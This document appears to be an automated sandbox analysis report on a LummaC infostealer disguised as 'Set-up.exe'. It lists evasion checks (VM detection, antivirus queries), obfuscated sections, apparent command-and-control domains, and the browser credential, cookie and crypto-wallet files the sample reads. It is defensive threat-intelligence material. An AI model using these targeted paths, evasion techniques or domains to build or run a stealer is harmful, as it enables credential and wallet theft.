Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_09159C6F	0_2_09159C6F
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_09187CF0	0_2_09187CF0
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_0918F150	0_2_0918F150
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_0918B1D0	0_2_0918B1D0
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_09160247	0_2_09160247
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_09176520	0_2_09176520
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_09171570	0_2_09171570
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_0915C621	0_2_0915C621
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_091616A0	0_2_091616A0
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_0916D900	0_2_0916D900
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_09155930	0_2_09155930
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_09169930	0_2_09169930
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_0918B940	0_2_0918B940
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_0915E9B0	0_2_0915E9B0
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_091538F0	0_2_091538F0
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_0915EB3B	0_2_0915EB3B
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_0918EBC0	0_2_0918EBC0
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_09154BE0	0_2_09154BE0
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_09165A72	0_2_09165A72
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_0916CAC4	0_2_0916CAC4
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_09175ACF	0_2_09175ACF
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_0917BD77	0_2_0917BD77
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_0916ADD0	0_2_0916ADD0
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_0916DDC0	0_2_0916DDC0
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_0917CC5D	0_2_0917CC5D
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_09167C7A	0_2_09167C7A
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_09160C83	0_2_09160C83
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_0918DE19	0_2_0918DE19
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_0917BE3B	0_2_0917BE3B
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_09181E50	0_2_09181E50
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_09188E40	0_2_09188E40
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_0917CE60	0_2_0917CE60
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_0917BE9D	0_2_0917BE9D
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_0917C8D0	0_2_0917C8D0
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_09152ED0	0_2_09152ED0
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_09185ED3	0_2_09185ED3
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_0917DEF1	0_2_0917DEF1
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_09159100	0_2_09159100
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_09168170	0_2_09168170
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_09187170	0_2_09187170
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_091561B0	0_2_091561B0
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_091820B0	0_2_091820B0
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_0916E390	0_2_0916E390
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_0916138A	0_2_0916138A
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_091873D0	0_2_091873D0
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_0917F211	0_2_0917F211
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_091542A0	0_2_091542A0
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_091582C0	0_2_091582C0
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_0915F529	0_2_0915F529
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_09159570	0_2_09159570
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_09186569	0_2_09186569
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_0917F5D9	0_2_0917F5D9
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_09157410	0_2_09157410
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_0918F450	0_2_0918F450
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_09180470	0_2_09180470
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_0917B48C	0_2_0917B48C
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_091664A3	0_2_091664A3
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_0916B729	0_2_0916B729
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_0918F780	0_2_0918F780
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_0917862A	0_2_0917862A
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_0918B650	0_2_0918B650
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_09156640	0_2_09156640
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_091886C0	0_2_091886C0

Source: C:\Users\user\Desktop\Set-up.exe	Code function: String function: 01EE548E appears 74 times
Source: C:\Users\user\Desktop\Set-up.exe	Code function: String function: 01ED975E appears 75 times
Source: C:\Users\user\Desktop\Set-up.exe	Code function: String function: 09157FA0 appears 77 times
Source: C:\Users\user\Desktop\Set-up.exe	Code function: String function: 09163CD0 appears 75 times

Source: Set-up.exe

Static PE information: invalid certificate

Source: Set-up.exe

Static PE information: Number of sections : 14 > 10

Source: Set-up.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: 00000000.00000002.2911165920.0000000001ED0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13

Source: Set-up.exe

Static PE information: Section: .ugwsvy ZLIB complexity 0.9984928385416667

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@1/0@1/1

Source: C:\Users\user\Desktop\Set-up.exe

Code function: 0_2_01ED0A51 CreateToolhelp32Snapshot,Thread32First,Wow64SuspendThread,CloseHandle,

0_2_01ED0A51

Source: C:\Users\user\Desktop\Set-up.exe

Code function: 0_2_09187CF0 CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,GetVolumeInformationW,

0_2_09187CF0

Source: C:\Users\user\Desktop\Set-up.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: Set-up.exe, 00000000.00000003.1850529822.0000000014760000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: Set-up.exe	ReversingLabs: Detection: 15%
Source: Set-up.exe	Virustotal: Detection: 16%

Source: C:\Users\user\Desktop\Set-up.exe

File read: C:\Users\user\Desktop\Set-up.exe

Jump to behavior

Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior

Source: Set-up.exe

Static PE information: More than 404 > 100 exports found

Source: Set-up.exe

Static file information: File size 2208480 > 1048576

Source: initial sample

Static PE information: section where entry point is pointing to: .ujck

Source: Set-up.exe	Static PE information: section name: .otfb
Source: Set-up.exe	Static PE information: section name: .qtgj
Source: Set-up.exe	Static PE information: section name: .uzceki
Source: Set-up.exe	Static PE information: section name: .vnhdw
Source: Set-up.exe	Static PE information: section name: .ibft
Source: Set-up.exe	Static PE information: section name: .ubtwzf
Source: Set-up.exe	Static PE information: section name: .ljzvt
Source: Set-up.exe	Static PE information: section name: .mekd
Source: Set-up.exe	Static PE information: section name: .ujck
Source: Set-up.exe	Static PE information: section name: .yihut
Source: Set-up.exe	Static PE information: section name: .vogrn
Source: Set-up.exe	Static PE information: section name: .ntsbow
Source: Set-up.exe	Static PE information: section name: .ugwsvy
Source: Set-up.exe	Static PE information: section name: .raicq

Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_01F0CD6E push eax; mov dword ptr [esp], 31A531AAh	0_2_01F0CD7C
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_01F0FE6E push eax; mov dword ptr [esp], 352E36E1h	0_2_01F0FE71
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_0918B5B0 push eax; mov dword ptr [esp], 31A531AAh	0_2_0918B5BE
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_0918E6B0 push eax; mov dword ptr [esp], 352E36E1h	0_2_0918E6B3

Source: Set-up.exe

Static PE information: section name: .yihut entropy: 7.010502693182308

Source: C:\Users\user\Desktop\Set-up.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate			Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot			Jump to behavior

Source: C:\Users\user\Desktop\Set-up.exe

Process information set: NOOPENFILEERRORBOX

Jump to behavior

Malware Analysis System Evasion

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Users\user\Desktop\Set-up.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController

Query firmware table information (likely to detect VMs)

Source: C:\Users\user\Desktop\Set-up.exe

System information queried: FirmwareTableInformation

Jump to behavior

Source: C:\Users\user\Desktop\Set-up.exe

Window / User API: threadDelayed 5628

Jump to behavior

Source: C:\Users\user\Desktop\Set-up.exe TID: 2308	Thread sleep time: -30000s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe TID: 4504	Thread sleep count: 5628 > 30			Jump to behavior

Source: C:\Users\user\Desktop\Set-up.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Source: C:\Users\user\Desktop\Set-up.exe	Last function: Thread delayed
Source: C:\Users\user\Desktop\Set-up.exe	Last function: Thread delayed

Source: Set-up.exe, 00000000.00000003.1981747629.0000000001D30000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1825591658.0000000001D1D000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1902977134.0000000001D30000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1923943207.0000000001D30000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2078010033.0000000001D30000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.2910467414.0000000001CF3000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: Hyper-V RAW

Source: C:\Users\user\Desktop\Set-up.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\Set-up.exe

Code function: 0_2_0918CD20 LdrInitializeThunk,

0_2_0918CD20

Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_01ED0341 mov edx, dword ptr fs:[00000030h]	0_2_01ED0341
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_01ED0901 mov eax, dword ptr fs:[00000030h]	0_2_01ED0901
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_01ED0CB1 mov eax, dword ptr fs:[00000030h]	0_2_01ED0CB1
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_01ED0F51 mov eax, dword ptr fs:[00000030h]	0_2_01ED0F51
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_01ED0F50 mov eax, dword ptr fs:[00000030h]	0_2_01ED0F50

HIPS / PFW / Operating System Protection Evasion

LummaC encrypted strings found

Source: Set-up.exe	String found in binary or memory: appliacnesot.buzz
Source: Set-up.exe	String found in binary or memory: cashfuzysao.buzz
Source: Set-up.exe	String found in binary or memory: hummskitnj.buzz
Source: Set-up.exe	String found in binary or memory: rebuildeso.buzz
Source: Set-up.exe	String found in binary or memory: scentniej.buzz
Source: Set-up.exe	String found in binary or memory: inherineau.buzz
Source: Set-up.exe	String found in binary or memory: screwamusresz.buzz
Source: Set-up.exe	String found in binary or memory: jammywritej.click
Source: Set-up.exe	String found in binary or memory: prisonyfork.buzz

Source: C:\Users\user\Desktop\Set-up.exe

Queries volume information: C:\ VolumeInformation

Jump to behavior

Source: C:\Users\user\Desktop\Set-up.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: Set-up.exe, 00000000.00000003.1923943207.0000000001D51000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1923838942.0000000001DA7000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1923943207.0000000001D1D000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2078010033.0000000001D1D000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.2910632304.0000000001D1D000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1981747629.0000000001D1D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: Set-up.exe, 00000000.00000003.1981747629.0000000001D50000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \Windows Defender\MsMpeng.exe

Source: C:\Users\user\Desktop\Set-up.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: Set-up.exe PID: 5356, type: MEMORYSTR
Source: Yara match	File source: 00000000.00000002.2911165920.0000000001ED0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: sslproxydump.pcap, type: PCAP

Found many strings related to Crypto-Wallets (likely being stolen)

Source: Set-up.exe, 00000000.00000003.1923943207.0000000001D48000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Electrum\wallets
Source: Set-up.exe, 00000000.00000003.1923943207.0000000001D48000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\ElectronCash\wallets
Source: Set-up.exe, 00000000.00000003.1902977134.0000000001D40000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Wallets/JAXX New Version
Source: Set-up.exe, 00000000.00000003.1923943207.0000000001D77000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: "app-store.json",".finger-print.fp","simple-storage.json","window-state.json"],"z":"Wallets/Binance","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\com.liberty.jaxx\\IndexedDB","m":["*"],"z":"Wallets/JAXX New Version","d":2,"fs":20971520},{"t":0,"p":"
Source: Set-up.exe, 00000000.00000003.1923943207.0000000001D48000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Exodus\exodus.wallet
Source: Set-up.exe, 00000000.00000003.1923943207.0000000001D48000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Exodus\exodus.wallet
Source: Set-up.exe, 00000000.00000003.1923943207.0000000001D77000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: 0}"}],"c":[{"t":0,"p":"%appdata%\\Ethereum","m":["keystore"],"z":"Wallets/Ethereum","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\Exodus\\exodus.wallet","m":[""],"z":"Wallets/Exodus","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\Ledger Live","m":[""]p
Source: Set-up.exe, 00000000.00000003.1902853656.0000000001D7D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
Source: Set-up.exe, 00000000.00000003.1902853656.0000000001D7D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: keystore

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
